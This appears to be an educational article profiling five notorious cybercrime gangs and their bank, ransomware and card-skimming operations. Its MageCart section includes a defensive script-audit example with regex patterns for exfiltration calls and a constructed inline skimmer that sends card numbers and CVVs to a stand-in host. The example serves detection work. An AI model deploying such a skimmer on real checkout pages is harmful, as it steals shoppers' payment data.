Cybercrime is a threat that concerns us all. Prevention starts with education, so now is the time to learn about the most dangerous cybercrime groups.
Organized cybercrime gangs have harnessed the reach of the Internet. In recent years their operations have become so sophisticated that they mount large-scale attacks on major companies and run campaigns that cause millions of dollars in damage.
Here are five of the most notorious cybercrime gangs that have made headlines.
1. Cobalt Cybercrime Gang
This cybercrime gang is behind the Carbanak and Cobalt malware campaigns, which have targeted more than 100 financial institutions in over 40 countries. Their campaigns against individual banks were elaborate enough to net the criminals more than $11 million per heist.
Cumulative losses to the financial sector are estimated at more than a billion dollars.
A typical Cobalt attack began with spear-phishing emails carrying malicious attachments, sent to bank employees. Once an attachment was opened, the malware gave the criminals control of the infected workstation, from which they pivoted into the bank’s internal network. They then spent months inside that network studying the bank’s operations and workflows.
It got even more sinister when they moved laterally to the servers that controlled the ATMs. In the final stage of the heist, known as “jackpotting”, ATMs were instructed remotely to dispense cash at a predetermined time and location, where a money mule was waiting to collect it.
The alleged mastermind was arrested in 2018, but experts believe the remaining members picked up where he left off: similar attacks on other banks were observed shortly after his arrest.
2. Lazarus Gang
The group, widely attributed to North Korea, is behind many nefarious attacks on institutions and organizations. The most notorious were the Sony Pictures breach in 2014 and the 2017 WannaCry ransomware outbreak that crippled the UK’s National Health Service (NHS).
Sony Pictures Leak
During the infamous Sony Pictures leak, employees were shocked to discover that their corporate network had been hacked. The attackers stole terabytes of confidential data, wiped files, and threatened to release the information if Sony refused their demands.
Networks were down for days and employees were forced to work with pen, paper and whiteboards. A few days later, the attackers began leaking the stolen confidential information to the press.
WannaCry Ransomware Attack
The Lazarus Group is also believed to be behind the 2017 WannaCry ransomware attack, which infected nearly a quarter of a million computers in 150 countries. It crippled many businesses and organizations, including the UK NHS, in the biggest cyberattack the NHS had ever seen.
WannaCry disrupted the health service’s operations for several days, led to the cancellation of more than six thousand appointments and cost the NHS around $100 million.
3. MageCart Syndicate
This large e-commerce hacking syndicate, made up of different groups under one big umbrella, rose to notoriety for stealing customer and payment-card data.
Their technique is web skimming: malicious JavaScript is injected into a site’s checkout page, either by compromising the site itself or one of the third-party scripts it loads, and copies card details as the customer types them into the payment form, sending them to a server the attackers control. Because the skimmer runs in the shopper’s browser and the real transaction still goes through, neither the customer nor the merchant notices anything at the time.
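Because a skimmer lives in the checkout page’s scripts, one practical check is to audit every `<script>` on that page: external scripts should come only from hosts you expect and carry Subresource Integrity hashes, and inline scripts that reference card fields and also contain an outbound-request primitive deserve a closer look. The following is an added example written for this article, not Magecart code or any vendor’s tool: the allowlist, the sample checkout HTML (with a constructed skimmer in it) and the keyword lists are all assumptions made here.

```javascript
// Heuristic audit of a checkout page's <script> tags for web-skimmer indicators.
// Constructed example: allowlist, sample HTML and patterns are assumed, not real.
const SCRIPT_ALLOWLIST = new Set(['shop.example', 'cdn.shop.example']); // assumed first-party hosts

// Payment-form field names a skimmer must touch, and primitives it can exfiltrate with.
const CARD_FIELD_RE = /\b(card(number|_number|num)|cvv|cvc|expir|ccnum|pan)\b/i;
const EXFIL_RE = /(fetch\(|XMLHttpRequest|sendBeacon|new\s+Image|\.src\s*=|WebSocket)/;

// Pull a single attribute value out of a tag's attribute string.
function attr(attrs, name) {
  const m = new RegExp(`\\b${name}\\s*=\\s*["']([^"']*)["']`, 'i').exec(attrs);
  return m ? m[1] : null;
}

// Returns a list of findings: unlisted script hosts, allowlisted scripts without
// SRI, and inline scripts that combine card-field access with an exfil primitive.
function auditScripts(html, allowlist = SCRIPT_ALLOWLIST, pageOrigin = 'https://shop.example/') {
  const scriptTag = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi; // fresh regex per call
  const findings = [];
  let m;
  while ((m = scriptTag.exec(html)) !== null) {
    const [, attrs, body] = m;
    const src = attr(attrs, 'src');
    if (src) {
      let host = null;
      try { host = new URL(src, pageOrigin).hostname; } catch { /* unparseable src */ }
      if (!host || !allowlist.has(host)) {
        findings.push({ kind: 'unlisted-script-host', src, host });
      } else if (!attr(attrs, 'integrity')) {
        findings.push({ kind: 'missing-sri', src, host });
      }
    } else if (CARD_FIELD_RE.test(body) && EXFIL_RE.test(body)) {
      findings.push({ kind: 'inline-skimmer-pattern', snippet: body.trim().slice(0, 80) });
    }
  }
  return findings;
}

// Constructed checkout page: one clean script, one allowlisted script missing SRI,
// one script from an unexpected host, and an inline skimmer that posts card data
// through an image request (a common Magecart-style exfil channel).
const SAMPLE_CHECKOUT_HTML = `
<html><body>
<form id="checkout">
  <input name="cardNumber"><input name="cvv"><input name="expiry">
</form>
<script src="https://shop.example/static/checkout.js" integrity="sha384-AAAA"></script>
<script src="https://cdn.shop.example/analytics.js"></script>
<script src="https://cdn.trusted-looking.example/jquery.min.js"></script>
<script>
  document.getElementById('checkout').addEventListener('submit', function () {
    var p = new URLSearchParams();
    p.set('c', document.querySelector('[name=cardNumber]').value);
    p.set('v', document.querySelector('[name=cvv]').value);
    new Image().src = 'https://cdn.trusted-looking.example/i.gif?' + btoa(p.toString());
  });
</script>
</body></html>`;

if (typeof require !== 'undefined' && require.main === module) {
  for (const f of auditScripts(SAMPLE_CHECKOUT_HTML)) console.log(f);
}
```

Run against the constructed page this reports three findings: the allowlisted analytics script has no `integrity` attribute, the jQuery copy comes from an unlisted host, and the inline handler touches `cardNumber` and `cvv` and then issues an image request. The heuristic is deliberately simple and will miss obfuscated skimmers; a Content Security Policy restricting `script-src` and `connect-src`, plus SRI on every static third-party script, is the control that actually blocks the exfiltration rather than merely flagging it.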
Over the years, MageCart groups have targeted thousands of e-commerce sites as well as other websites where users enter their card details. In 2018, for example, British Airways suffered a massive data breach at the hands of a MageCart group. The skimmer compromised the personal and financial information of 380,000 customers. But the attack on the airline was just the tip of the iceberg.
The same digital card-skimming campaign also hit hardware retailer Newegg only days after the British Airways attack. MageCart is also believed to be behind the Ticketmaster breach, in which a compromised third-party chat script exposed the data of around 40,000 customers.
4. Evil Corp
The name of the gang itself leaves no doubt that they are there to cause trouble, millions of dollars of trouble to be exact. This international cybercrime gang, with members based in Russia, uses various types of malware to attack all kinds of institutions, including a school district in Pennsylvania.
Most of their targets are organizations in Europe and the United States, and they have managed to evade arrest for years. Evil Corp rose to notoriety with the Dridex banking Trojan, which let the group harvest login credentials for hundreds of banks and financial institutions in 40 countries.
At the height of the Dridex campaign, Evil Corp managed to steal around $100 million.
They are so brazen that videos of the alleged bosses showing off their supercars and lavish lifestyle went viral last year. And although the US government formally indicted them in December 2019, many experts believe it will be difficult to bring the group’s founders to trial in the United States.
The indictment also failed to deter the group. In fact, a slew of new attacks on American small and medium-sized businesses in 2020 has been linked to Evil Corp. This includes Symantec’s discovery in June 2020 of a campaign against dozens of American companies, among them eight Fortune 500 companies, using a new ransomware family called WastedLocker.
5. GozNym Gang
This international cybercrime network is behind the GozNym malware, a powerful hybrid banking Trojan built to evade security products.
GozNym, described as a two-headed monster, is a hybrid of the Nymaim and Gozi malware families. The merger let the malware sneak onto a victim’s computer through malicious attachments or links, then stay hidden, waiting for the user to log in to an online bank account.
At that point the login details were harvested, the funds were stolen and siphoned off to US and foreign bank accounts, then laundered by mules. The operation infected more than 41,000 computers and stole some $100 million from account holders.
Organized Cybercrime Gangs
These international cybercrime gangs model their operations and business models on legitimate companies. So much so that, according to security analysts, they train new members, use collaboration tools, and even set up service agreements between the “specialists” they hire.
Most, like the GozNym group, have a CEO-like leader who recruits project managers on dark web forums. These project managers are specialists, each in charge of one part of the attack.
The GozNym gang, for example, had coding “specialists” who perfected the malware’s ability to evade security products, a separate team in charge of distribution, and another team of specialists who took over the victims’ bank accounts. They also hired mules and money launderers (“drop masters”) who received the funds and redistributed them to gang members abroad.
It is this level of organization and precision that has allowed these groups to infiltrate even the most established organizations, wreaking massive havoc and stealing millions of dollars.
Understanding how they work is one of the key steps to winning the fight against cybercrime. Experts hope that by studying these groups they can thwart attacks before they happen.